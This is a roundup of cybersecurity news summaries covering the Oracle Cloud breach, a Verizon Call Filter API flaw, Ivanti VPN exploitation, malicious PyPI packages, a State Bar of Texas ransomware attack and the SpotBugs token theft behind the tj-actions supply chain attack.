Oracle privately confirms Cloud breach to customers
Oracle has finally acknowledged to some customers that attackers have stolen old client credentials after breaching a “legacy environment” last used in 2017, Bloomberg reported. However, while Oracle told clients this is old legacy data that is not sensitive, the threat actor behind the attack has shared data with BleepingComputer from the end of 2024 and posted newer records from 2025 on a hacking forum. According to Bloomberg, the company also informed clients that cybersecurity firm CrowdStrike and the FBI are investigating the incident.
Verizon Call Filter API flaw exposed customers’ incoming call history
A vulnerability in Verizon’s Call Filter feature allowed customers to access the incoming call logs for another Verizon Wireless number through an unsecured API request. The flaw was discovered by security researcher Evan Connelly on February 22, 2025, and was fixed by Verizon sometime in the following month. However, the total period of exposure is unknown. Verizon’s Call Filter app is a free utility that offers users spam detection and automatic call blocking. A paid version (Plus) adds a spam lookup and risk meter, the ability to apply blocks by type of caller, and receive caller ID on unknown numbers.
Suspected Chinese spies right now hijacking buggy Ivanti gear – for third time in 3 years
Suspected Chinese government spies have been exploiting a newly disclosed critical bug in Ivanti VPN appliances since mid-March. This is now at least the third time in three years these snoops have been pwning these products. Plus, post-exploit, the Beijing-backed crew deployed on compromised Ivanti equipment two new malware strains along with variants of the Spawn software nasty, we’re told. Ivanti today detailed the under-attack 9.0-out-of-10-severity vulnerability, tracked as CVE-2025-22457, and said it affects Ivanti Connect Secure (version 22.7R2.5 and earlier), Pulse Connect Secure 9.x (end-of-support as of December 31), Ivanti Policy Secure, and ZTA gateways.
Malicious Python packages target popular Bitcoin library
When it comes to the frequency and sophistication of software supply chain attacks, few industries can compare with cryptocurrency. As ReversingLabs’ 2025 Software Supply Chain Security Report notes, 2024 saw close to two dozen sustained supply chain campaigns designed to compromise cryptocurrency applications, cryptocurrency owners’ wallets, and cryptocurrency trading platforms. The trend continues in 2025. A string of malicious software supply chain campaigns has targeted developers working on crypto-related applications. The latest popped onto the RL research team’s radar last week when automated machine-learning (ML) detection features in RL’s Spectra platform identified two malicious Python packages, posted to the Python Package Index (PyPI), containing code designed to exfiltrate sensitive database files.
State Bar of Texas Says Personal Information Stolen in Ransomware Attack
The State Bar of Texas this week started sending notification letters to thousands of individuals to notify them of a data breach resulting from a February ransomware attack. On February 12, the state bar association wrote in the notification letters, suspicious activity on its network prompted it to initiate response procedures and launch an investigation. The association determined that a threat actor had access to its network between January 28 and February 9, and it stole certain files, including ones containing personal information. The compromised information, the State Bar of Texas says, varies by individuals, and the copies of the notification letter that were submitted to Attorney General Offices have been redacted in this regard.
SpotBugs Access Token Theft Identified as Root Cause of GitHub Supply Chain Attack
The cascading supply chain attack that initially targeted Coinbase before becoming more widespread to single out users of the “tj-actions/changed-files” GitHub Action has been traced further back to the theft of a personal access token (PAT) related to SpotBugs. “The attackers obtained initial access by taking advantage of the GitHub Actions workflow of SpotBugs, a popular open-source tool for static analysis of bugs in code,” Palo Alto Networks Unit 42 said in an update this week. “This enabled the attackers to move laterally between SpotBugs repositories, until obtaining access to reviewdog.” There is evidence to suggest that the malicious activity began as far back as November, 2024, although the attack against Coinbase did not take place until March 2025.
